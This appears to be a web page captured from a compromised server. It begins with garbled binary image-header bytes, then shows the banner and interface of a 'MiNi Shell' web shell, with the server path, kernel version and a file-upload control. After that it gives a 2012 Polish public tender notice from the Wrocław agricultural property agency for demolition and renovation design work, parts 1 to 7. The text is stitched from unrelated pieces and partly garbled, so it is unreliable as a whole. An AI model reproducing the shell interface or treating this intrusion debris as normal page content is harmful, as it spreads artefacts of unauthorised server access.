JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/164192-N-2012.html

<p class="kh_header"><b>Wrocław: Wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 164192 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 071 3563919, 3563862, 3563863, faks 071 3579097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego. Przedmiot zamówienia podzielono na 9 odrębnych przedmiotów zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania robót objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty:
2.1	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie - to jest wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, przynajmniej: 
Dla przedmiotów zamówienia od 1 do 7 trzy usługi projektowania architektonicznego obejmującej wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego na obiektach budowlanych na kwotę przynajmniej 20tys. złotych każda - 
Dla przedmiotów zamówienia 8, 9 dwie usługi projektowania architektonicznego obejmującej wykonanie dokumentacji projektowej wraz z pełnieniem funkcji nadzoru autorskiego na wykonanie dróg dojazdowych, lub parkingów, miejsc postojowych, na kwotę przynajmniej 20tys. złotych każda  Wykonawca zobowiązany jest załączyć do oferty:
2.2.	Wykaz wykonanych usług, z podaniem ich wartości, przedmiotu, daty wykonania, odbiorców. 
2.3.	Dokumenty potwierdzające, że usługi z wykazu określonego wg wzoru formularza ofertowego zostały wykonane należycie. 
2.4.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym. Wykonawca zobowiązany jest załączyć do oferty:
2.5.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	Na potwierdzenie, ze wykonawca dysponuje  osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
 Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnienia do projektowania w branży: architektonicznej lub konstrukcyjno-budowlanej (dotyczy realizacji zamówienia opisanego w przedmiocie zamówienia od 1-do 7), drogowej (dotyczy realizacji zamówienia opisanego w przedmiocie 8, 9), oraz posiadającymi ważne zaświadczenie o przynależności do izby zawodowej - wg wzoru formularza ofertowego
2.5.	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca zobowiązany jest załączyć do oferty:
2.6.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
1	Zmiana terminu realizacji przedmiotu umowy 
a)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, tj. wstrzymanie realizacji przedmiotu umowy przez Zamawiającego,
b)	zmiany będące następstwem działania organów administracji w szczególności przekroczenie określonych przez prawo terminów wydania przez organy administracji decyzji zezwoleń itp.,
c)	zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego.
W przypadkach określonych w § 15 ust. 1, Zamawiający będzie miał prawo do wyznaczenia nowego termin realizacji umowy odpowiedniego do zaistniałych okoliczności.
2	Zmiany Osobowe 
c)	zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami o których mowa w ustawie Prawo budowlane lub innych uprawnieniach,
d)	zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem zamówienia po stronie Zamawiającego.
3	 Pozostałe Zmiany;
c)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
d)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, umowy, zmiana adresu, itp.),
e)	wydłużenie okresu gwarancji lub rękojmi o dowolny okres. 
4	Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 11:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, ul. Mińska 60, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot 1 - Wykonanie projektu rozbiórki 58/100 części środka trwałego o numerze inw. 41/182 (budynku obory) do poziomu gruntu, posadowionej na działce ewidencyjnej nr 46/18 obręb Śrem, gmina Gaworzyce pow. Polkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek gospodarczy w zabudowie zwartej z budynkiem mieszkalnym. Ściany budynku murowane z cegły pełnej oraz kamienia. Strop monolityczny ceglany. Dach o konstrukcji drewnianej, płaski pokryty papą.
Dokumentacja projektowa stanowić będzie:
Projekt budowlany  -   5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2  szt.
Przedmiar robót  - 2 szt.
Kosztorys inwestorski -  2 szt.
Dokumentacja powinna obejmować zabezpieczenie ściany szczytowej budynku mieszkalnego    pozostałego po rozbiórce obiektów.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot 2-Wykonanie projektu rozbiórki do poziomu gruntu budynku gospodarczego obory oraz lokalu mieszkalnego znajdujących się w jednym obiekcie budowlanym. Obora o numerze inwentarzowym 72/182, lokal mieszkalny nr inw. 219/10/165 położone w miejscowości Górzyn 21H oraz budynku gospodarczego obory i dwóch lokali mieszkalnych znajdujących się w jednym obiekcie budowlanym. Obora o numerze inwentarzowym 73/182, lokale mieszkalne nr inw. 319/10/165 położone w miejscowości Górzyn 21F, gm. Rudna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obiekty posadowione na działce ewidencyjnej nr  299/19.
Dokumentacja powinna obejmować zabezpieczenie ścian szczytowych budynku mieszkalnego pozostałego po rozbiórce obiektów.
Budynek gospodarczy obora z jednym lokalem mieszkalnym w zabudowie zwartej. Budynek gospodarczy z poddaszem użytkowym. Ściany murowane z cegły pełnej oraz kamienia. Strop monolityczny ceglany. Dach dwuspadowy o konstrukcji drewnianej pokryty płytami eternitowymi.
Budynek gospodarczy obora z dwoma lokalami mieszkalnymi w zabudowie zwartej. Budynek gospodarczy z poddaszem użytkowym. Ściany murowane z cegły pełnej oraz kamienia. Strop monolityczny ceglany. Dach dwuspadowy o konstrukcji drewnianej pokryty dachówką ceramiczną w koronkę.

Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot 3 -Wykonanie projektu rozbiórki do poziomu gruntu budynku-magazynu. Magazyn o numerze inwentarzowym 347/09/132, położony w miejscowości Brodów, gm. Rudna. Magazyn posadowiony na działce ewidencyjnej nr 323/34..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ściany magazynu murowane z cegły pełnej i kamienia. Strop monolityczny ceglany zawalony w całości. Dach dwuspadowy o konstrukcji drewnianej pokryty dachówką ceramiczną w koronkę.
Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie projektu rozbiórki do poziomu gruntu budynku gospodarczego posadowionego na działce ewidencyjnej nr  37/2 obręb Dankowice gm. Żukowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek gospodarczy z poddaszem użytkowym. Ściany murowane z cegły pełnej. Strop drewniany. Dach dwuspadowy o konstrukcji drewnianej pokryty w części dachówką ceramiczną, w części kryty płytami eternitowymi.
Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiot 5 Wykonanie projektu remontu klatki schodowej wraz z elewacją budynku w miejscowości Raszówka, 
ul. Witosa 16, gm. Lubin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Wykonawca musi uzyskać dla dokumentacji pozytywną opinię Wojewódzkiego Konserwatora Zabytków w Legnicy.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie projektu budowlanego dotyczącego remontu dachu, schodów zewnętrznych i klatki schodowej oraz elewacji budynku mieszkalnego położonego w miejscowości Golanka Górna 23. Budynek posadowiony na działce ewidencyjnej nr 113/16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiot 7 - Wykonanie inwentaryzacji budowlanej w dwóch egzemplarzach (w tym 1 egz. Do archiwum Wojewódzkiego Urzędu Ochrony Zabytków w Legnicy) w skali 1:50, oraz wykonanie dokumentacji projektowej dotyczącej rozbiórki budynków: kuźni, bez numeru inwentarzowego, warsztatu - nr inw. 013/180, Stodoły -garaże, nr inw. 012/180, magazynu. nr inw 011/180, magazynu nr inw 010/180,wiaty nr inw 009/180. Budynki posadowione na działce ewidencyjnej nr 670/5 obręb Lipa, gmina Bolków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokumentacja projektowa stanowić będzie:
Projekt budowlany -  5 szt.
Specyfikację Techniczną Wykonania i Odbioru Robót - 2 szt.
Przedmiar robót - 2 szt.
Kosztorys inwestorski - 2 szt.
Wykonawca musi uzyskać dla dokumentacji projektowej i dokumentacji inwentaryzacyjnej pozytywną opinię Wojewódzkiego Konserwatora Zabytków w Legnicy.
Uwaga: Przy realizacji zamówienia Zamawiający nie wymaga od Wykonawcy uzyskania Decyzji - pozwolenia na budowę. Zamawiający własnym staraniem, na podstawie złożonej dokumentacji przez Wykonawcę wystąpi o uzyskanie Decyzji - pozwolenia na budowę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
